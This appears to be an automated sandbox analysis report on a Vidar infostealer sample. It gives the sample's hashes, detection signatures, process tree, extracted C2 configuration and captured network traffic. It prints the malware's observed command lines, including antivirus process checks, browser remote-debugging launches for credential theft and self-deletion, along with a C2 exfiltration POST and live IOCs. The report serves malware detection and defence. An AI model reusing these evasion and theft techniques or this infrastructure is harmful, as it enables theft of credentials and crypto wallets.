Windows Analysis Report
trZG6pItZj.exe

Overview

General Information

Sample name: trZG6pItZj.exe (renamed because original name is a hash value)
Original sample name: 1b31c291993985499cf544cc549e9028.exe
Analysis ID: 1579620
MD5: 1b31c291993985499cf544cc549e9028
SHA1: 068d213d11e48f8dda5d90a96512b8101f29ad9e
SHA256: f8615202ee1e9ccb7509f98c643b7bd6e01e439c57b78fd547cf96fd27ec5a47
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • trZG6pItZj.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\trZG6pItZj.exe" MD5: 1B31C291993985499CF544CC549E9028)
    • cmd.exe (PID: 1672 cmdline: "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5776 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6496 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3868 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5964 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3440 cmdline: cmd /c md 139308 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5968 cmdline: findstr /V "Frame" Ron MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1440 cmdline: cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Procedures.com (PID: 1576 cmdline: Procedures.com j MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 2292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 6152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7888 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 2812 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3116 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 5532 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 7904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 5668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7728 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Procedures.com.3fb0000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
                Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Procedures.com j, ParentImage: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, ParentProcessId: 1576, ParentProcessName: Procedures.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2292, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started, Author: Joe Security, Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1672, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5964, ProcessName: findstr.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-23T06:23:49.871078+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.5 | 49767 | TCP
                2024-12-23T06:23:52.173133+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.5 | 49772 | TCP
                2024-12-23T06:23:52.172957+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49772 | 94.130.188.57 | 443 | TCP
                2024-12-23T06:23:45.287338+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49754 | 94.130.188.57 | 443 | TCP

                AV Detection

                Source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: trZG6pItZj.exe, ReversingLabs: Detection: 18%
                Source: trZG6pItZj.exe, Virustotal: Detection: 26%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.2% probability
                Source: trZG6pItZj.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49739 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: trZG6pItZj.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\trZG6pItZj.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\trZG6pItZj.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8DC54
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A087
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A1E2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00E8E472
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00E9A570
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E966DC FindFirstFileW,FindNextFileW,FindClose,11_2_00E966DC
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E5C622 FindFirstFileExW,11_2_00E5C622
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00E973D4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E97333 FindFirstFileW,FindClose,11_2_00E97333
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8D921
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\139308
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\139308\
                Source: chrome.exe, Memory has grown: Private usage: 10MB later: 38MB

                Networking

                Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49772 -> 94.130.188.57:443
                Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.5:49772
                Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.5:49767
                Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49754 -> 94.130.188.57:443
                Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global traffic, HTTP traffic detected: GET /k04ael HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 149.154.167.99
                Source: Joe Sandbox View, IP Address: 162.159.61.3
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknown, TCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknown, TCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00E9D889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_00E9D889
                Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 | Host: toptek.sbs | Connection: Keep-Alive | Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
                Source: global traffic, HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 | Host: clients2.googleusercontent.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global traffic, HTTP traffic detected: GET /b?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 | Host: sb.scorecardresearch.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global traffic, HTTP traffic detected: GET /b2?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 | Host: sb.scorecardresearch.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 | Cookie: UID=19Abb18dd40861f844b83d11734931476; XID=19Abb18dd40861f844b83d11734931476
                Source: global traffic, HTTP traffic detected: GET /c.gif?rnd=1734931474876&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f980c21c7474272aa4243416d38e40b&activityId=7f980c21c7474272aa4243416d38e40b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0DA4B0A2ABA24210907773DA18D43FAE&MUID=2DB99B69D85C6DF817C28E37D9F46CAD HTTP/1.1 | Host: c.msn.com | Connection: keep-alive | sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | sec-ch-ua-platform: "Windows" | Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://ntp.msn.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 | Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; SM=T
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.dr, String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log6.24.dr, String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log6.24.dr, String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log6.24.dr, String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: global traffic DNS traffic detected: DNS query: ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzV
                Source: global traffic DNS traffic detected: DNS query: t.me
                Source: global traffic DNS traffic detected: DNS query: toptek.sbs
                Source: global traffic DNS traffic detected: DNS query: www.google.com
                Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
                Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
                Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global traffic DNS traffic detected: DNS query: assets.msn.com
                Source: global traffic DNS traffic detected: DNS query: c.msn.com
                Source: global traffic DNS traffic detected: DNS query: api.msn.com
                Source: unknown HTTP traffic detected:
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: toptek.sbs
                    Content-Length: 255
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
